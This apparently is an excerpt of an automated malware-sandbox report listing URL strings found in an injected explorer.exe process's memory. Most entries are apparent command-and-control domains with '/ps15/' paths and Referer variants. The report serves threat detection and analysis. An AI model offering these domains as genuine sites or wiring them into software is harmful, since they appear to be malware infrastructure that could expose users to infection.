                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33pgaaa.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33pgaaa.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33pgaaa.com/ps15/www.ellipsive.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33pgaaa.comReferer:
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275065911.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271546398.000000000C3FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077197592.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748567632.000000000C428000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2274367081.000000000C41F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.briefout.cloud
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.briefout.cloud/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.briefout.cloud/ps15/www.kaidifeiniroo.net
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.briefout.cloudReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.casinomaxnodepositbonus.icu
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.casinomaxnodepositbonus.icu/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.casinomaxnodepositbonus.icu/ps15/www.33pgaaa.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.casinomaxnodepositbonus.icuReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ellipsive.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ellipsive.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ellipsive.com/ps15/www.mayson-wedding.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ellipsive.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fashiontrendshub.xyz
                Source: explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fashiontrendshub.xyz/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fashiontrendshub.xyzReferer:
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gmgex1.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gmgex1.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gmgex1.com/ps15/www.passrmale.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gmgex1.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomenasorry.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomenasorry.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomenasorry.com/ps15/www.briefout.cloud
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomenasorry.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaidifeiniroo.net
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaidifeiniroo.net/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaidifeiniroo.net/ps15/www.plasoi.xyz
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaidifeiniroo.netReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayson-wedding.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayson-wedding.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayson-wedding.com/ps15/www.gmgex1.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayson-wedding.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.passrmale.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.passrmale.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.passrmale.com/ps15/www.trezorsuite.net
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.passrmale.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plasoi.xyz
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plasoi.xyz/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plasoi.xyz/ps15/www.stdaev.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plasoi.xyzReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resmierabaru20.shop
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resmierabaru20.shop/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resmierabaru20.shop/ps15/www.thepeacedealers.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resmierabaru20.shopReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.seraphmovement.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.seraphmovement.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.seraphmovement.com/ps15/www.fashiontrendshub.xyz
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.seraphmovement.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stdaev.com
